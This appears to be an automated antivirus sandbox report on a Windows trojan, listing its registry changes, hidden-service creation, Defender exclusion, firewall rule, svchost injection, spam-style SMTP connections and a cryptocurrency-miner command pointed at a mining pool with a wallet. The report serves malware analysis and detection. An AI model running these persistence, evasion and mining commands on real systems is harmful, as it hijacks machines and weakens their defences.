Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\helhagu] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\helhagu] 'ImagePath' = '%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\helhagu] 'ImagePath' = '%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe'
Creates the following services
- 'helhagu' %WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d"<Full path to file>"
- 'helhagu' %WINDIR%\SysWOW64\helhagu\zlndpgvs.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\helhagu' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\zlndpgvs.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\zlndpgvs.exe to %WINDIR%\syswow64\helhagu\zlndpgvs.exe
Deletes itself.
Network activity
Connects to
- 'mi##########m.mail.protection.outlook.com':25
- 'ma###.cmbchina.com':25
- 'mx#.###group.iphmx.com':25
- 'ma##.ttmail.com':25
- 'mx.##.#tinternet.com':25
- 'mx#.###803-69.iphmx.com':25
- 'mx.####o.locaweb.com.br':25
- 'ba#####da.cromcorp.com':25
- 'mx.##ndex.net':25
- 'fa###ool.xyz':10060
- 'eu#.###.#rotection.outlook.com':25
- 'alt1.gmail-smtp-in.l.google.com':25
- 'mx#.#ate.com':25
- 'mx#.###.#ailpod9-cph3.one.com':25
- 'mt##.##0.yahoodns.net':25
- 'ma##.##ctorpitangu.com':25
- 'fi########.mail.protection.outlook.com':25
- 'mx#######c02.gslb.pphosted.com':25
- 'ki##########-br.mail.protection.outlook.com':25
- 'ma##.#istayatak.com':25
- 'mx#.###ay.renater.fr':25
- 'ma##.#ortruck.com':25
- 'sp#####l2-5.vistec.net':25
- 'ma##.#ohabcp.com.br':25
- '15#.#40.201.174':443
- 'al############com-br.mail.protection.outlook.com':25
- 'ma##.#rdakostum.com':25
- 'mx#######f01.gslb.pphosted.com':25
- 'ge##########cl.mail.protection.outlook.com':25
- 'mq##.#indowsliv.com':25
- 'mx##.#-online.de':25
- '52.##3.241.7':443
- 'mx#.cvk.lv':25
- 'mb####.mynet.com':25
- 'em##.freenet.de':25
- 'ni#####b.nilko.com.br':25
- 'mx##.###stechservices.net':25
- 'mx#.#harter.net':25
- 'mx#######b01.gslb.pphosted.com':25
- 'google.com':80
- '17#.#13.115.157':418
- '17#.#13.115.156':418
- '80.#6.75.4':418
- '17#.#13.115.155':418
- 'mx#######001.gslb.pphosted.com':25
- '17#.#13.115.154':418
- 'ng#.#erim.net':25
- 'mx###.##tsol.xion.oxcs.net':25
- 'alt1.aspmx.l.google.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- '80.##.75.254':482
- 'sv####lfheim.top':443
- '17#.#13.115.153':418
- 'mx####.##il.gm0.yahoodns.net':25
- 'sp######01.nex-killspam.com':25
- 'ff######x-vip2.prodigy.net':25
- 'mx#.free.fr':25
- 'mx#######a04.gslb.pphosted.com':25
- 'mx#######602.gslb.pphosted.com':25
- 'mx#######403.gslb.pphosted.com':25
- 'mx#.##l.iphmx.com':25
- 'sp#####an.isomedia.com':25
- 'mg###.#edia-general.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'mx.###dmatic.com':25
- 'mx.###m.kgslb.com':25
- 'mx#.##ailsrvr.com':25
- 'mx.########l.com.cust.b.hostedemail.com':25
- 'mx#######601.gslb.pphosted.com':25
- 'mx######b2d01.pphosted.com':25
- 'mx#######d01.gslb.pphosted.com':25
- 'cl######n-03.mbs.boeing.net':25
- 'fo###ne.dago.cz':25
TCP
HTTP GET requests
- http://www.google.com/
Other
- 'sv####lfheim.top':443
- 'fa###ool.xyz':10060
- 'ma##.##ctorpitangu.com':25
- 'mx.##ndex.net':25
- 'mx.##.#tinternet.com':25
- 'mx#.###803-69.iphmx.com':25
- 'mx#.###group.iphmx.com':25
- 'fi########.mail.protection.outlook.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mb####.mynet.com':25
- 'mx#.cvk.lv':25
- 'ki##########-br.mail.protection.outlook.com':25
- 'mq##.#indowsliv.com':25
- 'ma##.#rdakostum.com':25
- '15#.#40.201.174':443
- 'ma##.#ortruck.com':25
- 'sp#####l2-5.vistec.net':25
- 'mx#.###.#ailpod9-cph3.one.com':25
- 'eu#.###.#rotection.outlook.com':25
- 'mt##.##0.yahoodns.net':25
- 'mx##.###stechservices.net':25
- 'cl######n-03.mbs.boeing.net':25
- '17#.#13.115.154':418
- '80.#6.75.4':418
- '17#.#13.115.153':418
- '17#.#13.115.156':418
- '17#.#13.115.157':418
- '17#.#13.115.155':418
- 'alt1.aspmx.l.google.com':25
- 'ma##.#istayatak.com':25
- '52.##3.241.7':443
- 'ng#.#erim.net':25
- 'sp######01.nex-killspam.com':25
- 'ff######x-vip2.prodigy.net':25
- 'mx#######d01.gslb.pphosted.com':25
- 'aspmx.l.google.com':25
- 'mx.###m.kgslb.com':25
- 'sp#####an.isomedia.com':25
- 'alt2.aspmx.l.google.com':25
- '80.##.75.254':482
- 'mx####.##il.gm0.yahoodns.net':25
- 'ni#####b.nilko.com.br':25
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK bl####ngarians.com
- DNS ASK ca###oup.com
- DNS ASK mx#.###group.iphmx.com
- DNS ASK ca####lliance.com
- DNS ASK cm###ina.com
- DNS ASK ma###.cmbchina.com
- DNS ASK tt##il.com
- DNS ASK ma##.ttmail.com
- DNS ASK cr###orp.com
- DNS ASK dr##.com
- DNS ASK sf####amarca.gov.ar
- DNS ASK jx####.#wtybk.r.mrcx.com
- DNS ASK ad#.##ilce.unesp.br
- DNS ASK fi#.edu.br
- DNS ASK fi########.mail.protection.outlook.com
- DNS ASK ba#####da.cromcorp.com
- DNS ASK de##riv.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK bt###ernet.com
- DNS ASK mx#.###803-69.iphmx.com
- DNS ASK mx#.#ate.com
- DNS ASK gm##l.com
- DNS ASK alt1.gmail-smtp-in.l.google.com
- DNS ASK li#e.se
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK fa###ool.xyz
- DNS ASK am###trade.com
- DNS ASK na##.com
- DNS ASK do####pitangu.com
- DNS ASK ze####cilevent.com
- DNS ASK mx.##ndex.net
- DNS ASK tn#.net
- DNS ASK sm###w.turk.net
- DNS ASK gl##o.com
- DNS ASK mx.####o.locaweb.com.br
- DNS ASK na###ederal.org
- DNS ASK ma##.##ctorpitangu.com
- DNS ASK wa##doo.nl
- DNS ASK fa####isa.com.br
- DNS ASK ol###.com.uy
- DNS ASK sr#.com
- DNS ASK al############com-br.mail.protection.outlook.com
- DNS ASK co###cp.com.br
- DNS ASK ma##.#ohabcp.com.br
- DNS ASK st######eater-wiesbaden.de
- DNS ASK sp#####l2-5.vistec.net
- DNS ASK be##buy.com
- DNS ASK bo###uck.com
- DNS ASK ma##.#ortruck.com
- DNS ASK co###icopy.com
- DNS ASK ac###itiers.fr
- DNS ASK mx#.###ay.renater.fr
- DNS ASK vi###yatak.com
- DNS ASK ma##.#istayatak.com
- DNS ASK na##ret.cl
- DNS ASK ni###.com.br
- DNS ASK ni#####b.nilko.com.br
- DNS ASK ce##sa.es
- DNS ASK al#####esilva.com.br
- DNS ASK ar###ostum.com
- DNS ASK ma##.#rdakostum.com
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK mx#######c02.gslb.pphosted.com
- DNS ASK te##a.es
- DNS ASK ki###aum.com.br
- DNS ASK ki##########-br.mail.protection.outlook.com
- DNS ASK my##t.com
- DNS ASK mb####.mynet.com
- DNS ASK cv#.lv
- DNS ASK mx#.cvk.lv
- DNS ASK ro###tmail.com
- DNS ASK t-##line.de
- DNS ASK mx##.#-online.de
- DNS ASK wi###wsliv.com
- DNS ASK mq##.#indowsliv.com
- DNS ASK ge###rmeria.cl
- DNS ASK ge##########cl.mail.protection.outlook.com
- DNS ASK li#e.de
- DNS ASK qu###omm.com
- DNS ASK da#o.cz
- DNS ASK mx#.###.#ailpod9-cph3.one.com
- DNS ASK ol##ich.se
- DNS ASK up##gon.com
- DNS ASK ca####a-asiapac.com
- DNS ASK sp######01.nex-killspam.com
- DNS ASK at#.net
- DNS ASK ff######x-vip2.prodigy.net
- DNS ASK ka##ic.com
- DNS ASK km#.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK ve###asia.com
- DNS ASK au#.ibm.com
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK me###nger.com
- DNS ASK mx#######601.gslb.pphosted.com
- DNS ASK bi###ytel.com
- DNS ASK mx.########l.com.cust.b.hostedemail.com
- DNS ASK mx#######d01.gslb.pphosted.com
- DNS ASK ar###ncrete.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK as####materials.com
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK 23#.###.#12.82.dnsbl.sorbs.net
- DNS ASK ye##m.net
- DNS ASK 23#.###.#12.82.bl.spamcop.net
- DNS ASK 23#.###.#12.82.zen.spamhaus.org
- DNS ASK 23#.###.##2.82.sbl-xbl.spamhaus.org
- DNS ASK 23#.###.#12.82.cbl.abuseat.org
- DNS ASK ng#.#erim.net
- DNS ASK sv####lfheim.top
- DNS ASK ro##rs.com
- DNS ASK re##tor.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK hi#####supplyinc.com
- DNS ASK mx###.##tsol.xion.oxcs.net
- DNS ASK 23#.###.112.82.in-addr.arpa
- DNS ASK google.com
- DNS ASK ts##.org
- DNS ASK mx#######.mail.am0.yahoodns.net
- DNS ASK sn###allinc.com
- DNS ASK aspmx.l.google.com
- DNS ASK so####xstudio.com
- DNS ASK mx#.##ailsrvr.com
- DNS ASK mx#######a04.gslb.pphosted.com
- DNS ASK pi##man.us
- DNS ASK ib#.com
- DNS ASK pi####lecart.com
- DNS ASK on##ne.fr
- DNS ASK mx#.free.fr
- DNS ASK bo##ng.com
- DNS ASK cl######n-03.mbs.boeing.net
- DNS ASK ch##ter.net
- DNS ASK mx#.#harter.net
- DNS ASK ba###rweld.com
- DNS ASK mx##.###stechservices.net
- DNS ASK cs##.com
- DNS ASK al#####ruckcompany.com
- DNS ASK fr##net.de
- DNS ASK em##.freenet.de
- DNS ASK fr###ier.com
- DNS ASK un###udios.com
- DNS ASK mx#######602.gslb.pphosted.com
- DNS ASK pi####msoftware.com
- DNS ASK cr###erbmw.com
- DNS ASK ha##ail.net
- DNS ASK mx.###m.kgslb.com
- DNS ASK co###atic.com
- DNS ASK mx.###dmatic.com
- DNS ASK co######entertainment.com
- DNS ASK ep.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK me####general.com
- DNS ASK mg###.#edia-general.com
- DNS ASK se##et.com
- DNS ASK sp#####an.isomedia.com
- DNS ASK dh#.com
- DNS ASK mx#.##l.iphmx.com
- DNS ASK ei##ff.com
- DNS ASK mx#######403.gslb.pphosted.com
- DNS ASK tl##it.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK fo###ne.dago.cz
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\helhagu\zlndpgvs.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\helhagu\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\zlndpgvs.exe" %WINDIR%\SysWOW64\helhagu\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create helhagu binPath= "%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description helhagu "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start helhagu' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\helhagu\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\zlndpgvs.exe" %WINDIR%\SysWOW64\helhagu\
- '%WINDIR%\syswow64\sc.exe' create helhagu binPath= "%WINDIR%\SysWOW64\helhagu\zlndpgvs.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description helhagu "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start helhagu
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half